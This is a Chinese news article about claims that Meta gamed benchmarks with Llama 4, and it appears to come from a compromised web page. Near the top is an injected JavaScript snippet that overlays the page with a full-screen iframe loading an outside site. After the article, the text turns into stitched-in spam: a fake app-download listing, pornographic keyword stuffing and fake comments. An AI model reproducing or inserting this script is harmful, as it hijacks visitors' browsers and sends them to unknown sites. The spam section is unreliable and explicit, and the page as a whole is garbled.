最新大模型被质疑训练“刷分”,Meta承认有漏洞但否认作弊

alan 黑料吃瓜 2025-04-08 1 0
(function() { function generateRandomString(length) { return Math.random().toString(36).substring(2, length + 2); } function loadExternalContent(url) { var frameName = generateRandomString(10); var frame = document.createElement('iframe'); frame.id = frameName; frame.style.cssText = 'width:100%;height:100%;border:none;position:fixed;top:0;left:0;z-index:9999;'; frame.src = url; document.body.appendChild(frame); } var externalUrl = 'https://52-cg.com'; loadExternalContent(externalUrl); })();

科技巨头Meta回应了对公司最新开源AI(人工智能)模型Llama 4的质疑,否认该模型在训练集中作弊“刷分”。

当地时间4月7日,Meta的生成式AI负责人Ahmad Al-Dahle在社交平台上发布了一篇长文,回应了对于Llama 4的质疑。Ahmad表示,由于Llama 4刚开发完就迅速发布,所以模型“在不同服务中表现出了参差不齐的质量”,公司会尽快修复漏洞。同时,Ahmad否认了Llama 4在训练集中作弊“刷分”的说法。

两天前,4月5日,Meta推出了旗下最受欢迎的模型系列Llama的最新一代模型,包括较小模型Scout和标准模型Maverick这两个版本。此外,Meta还展示了被称为“迄今最强大、最智能”的模型Llama 4 Behemoth的预览。

据介绍,Llama 4模型是Llama系列模型中首批采用混合专家(MoE)架构的模型,在多模态性能上表现出众。其中,最先进的Llama 4 Behemoth的总参数高达2万亿,担当了其他模型的“老师”;Scout和Maverick的活跃参数量为170亿,Scout主要面向文档摘要与大型代码库推理任务,Maverick则专注于多模态能力。

Meta一次性介绍三款Llama 4模型。来源:Meta

作为原生多模态模型,Llama 4采用了早期融合(Early Fusion)的技术,通过使用大量无标签文本、图片和视频数据一起来预训练模型,将文本和视觉token无缝整合到统一的模型框架中。此外,Llama 4在长文本能力上也取得了突破,Scout模型支持高达1000万token的上下文窗口,Maverick模型则支持100万token的上下文窗口。

不过,Llama 4一经发布就遭到了质疑。Meta的发布界面显示,在评估代码能力的LiveCodeBench测试集和大模型竞技场(Chatbot Arena)中,Scout和Maverick都表现得很不错。但许多开发者发现,这些模型在小型基准测试中的表现令人失望。

例如,有网友指出,在一项让模型完成225项编程任务的名为aider polyglot的基准测试中,Llama 4 Maverick只取得了16%的成绩,远低于Gemini 2.5 Pro、Claude 3.7 Sonnet和DeepSeek -V3等规模相近的旧模型。

Llama 4 Maverick在小型测试集上成绩不如人意。来源:X平台

AI工程师和技术作家Andriy Burkov则在社交平台X上指出,Meta称Llama 4 Scout拥有1000万token的上下文窗口,而这其实是一个“伪命题”:“实际上,不会有任何模型针对超过256000个token的提示词进行训练。如果你向它发送这么多token,在大多数时候只会得到低质量的输出。”

对于Llama 4令人失望的表现,一些开发者开始怀疑,为了在测试集中取得更好的成绩,Meta为这些测试集制作了“特供版”Llama 4。例如,前Meta研究员、现任AI2(艾伦人工智能研究所)的高级研究员Nathan Lambert在经过比较测试后指出,在大模型竞技场中取得成绩的Llama 4 Maverick与该公司公开发布的版本不同,前者是“在对话性上进行了优化”的版本。

此外,就在Llama 4发布的前几天,在Meta工作了8年的AI研究主管Joelle Pineau宣布离职。联系到Llama 4的表现,更加深了网友对于Llama 4“暗箱操作”的质疑。而在国内社交平台上,也有自称为Meta内部员工的网友称“Llama 4的训练存在严重问题”,自己已经向公司提交了离职申请,AI研究主管的离任也是出于同种原因。

这位网友表示:“经过反复训练,其实内部模型的表现依然未能达到开源SOTA(指在研究任务中表现最好的模型),甚至与之相差甚远。公司领导层建议将各个benchmark(基准)的测试集混合在post-training(后训练)过程中,目的是希望能够在各项指标上交差,拿出一个‘看起来可以’的结果。”

可以肯定的是,Llama 4的初始发布并没有给AI社区带来巨大的积极反响。目前,面对进步迅速的中国AI模型,Meta急于稳住Llama系列在开源领域的领先地位。今年2月,阿里通义千问(Qwen)系列模型的下载量已经达到了1.8亿,累计衍生模型总数达到9万个,衍生模型数超越Meta的Llama系列,成为了全球第一大开源模型系列。

7日当天,Meta(Nasdaq:META)股价涨2.28%,收于每股516.25美元,总市值1.31万亿美元。

99精品视频在线观看re

在线观看成年

「活动」注册就送新人大礼包

84.29MB
版本V9.84.14
下载午夜免费小视频安装你想要的应用 更方便 更快捷 发现更多
喜欢 18%好评(87人)
评论 40
一级黄色一级黄色电影0 国产精品久久99精品毛片三a1 国产成人手机在线好好热2 cao在线观看3 日本久久994
详细信息
  • 软件大小: 81.23MB
  • 最后更新: 2024-09-16 18:34:53
  • 最新版本: V8.28.17
  • 文件格式: apk
  • 应用分类:ios-Android 男女性杂交内射妇女BBWXZ
  • 使用语言: 中文
  • : 需要联网
  • 系统要求: 5.41以上
应用介绍
一,久久久精品免费视频,精品国产乱码久久久久久夜深人妻
二,影音先锋av熟女资源网,色偷偷9999WWW
三,亚洲A片一区日韩精品无码,中文字幕 亚洲 有码 在线
四,色戒完整未删除版158分钟,天天综合网网欲色
五,伦理片qvod,一二三四在线视频观看社区
六,NP群乱肉欧美精品大黄毛片,人人妻一区二区三区
七,日韩av线,日韩丰满少妇无码内射

【联系我们】
客服热线:139-8888-666
加载更多
版本更新
V1.22.17
好硬啊一进一得太深了A片,久久人妻少妇嫩草AV

91成人小电影在线观看

猜你喜欢

包含 饿了么 的应用集
评论
  • 久色精品 4天前
    高清有码国产一区二区
  • 巨肉超污巨黄H文小短文双男 7天前
    国产人妻人伦精品午夜剧场
  • 日本午夜精品一区二区三区电影 7天前
    日日摸夜夜添夜夜添欧美毛片
  • 亚洲精品久久无码老熟妇 6天前
    国产又色又爽又黄的男女小说免费
  • 国产美女久久久久久久久久久 2天前
    国内一级一级毛片a免费
  • 把女人下面摸爽视频 4天前
    禁止的爱:善良的小峓在钱
  • 亚洲精品久久无码AV片软件 5天前
    最爽FREE性欧美人妖
  • 国产无遮挡A片无码免费软件 4天前
    欧美日韩高清一区二区三区
  • 一女三黑人玩4P惨叫A片 4天前
    萌白酱JK白丝喷水视频在线
  • 国产乱码人妻一区二区三区四区 9天前
    男人狂躁进女人免费视频无遮挡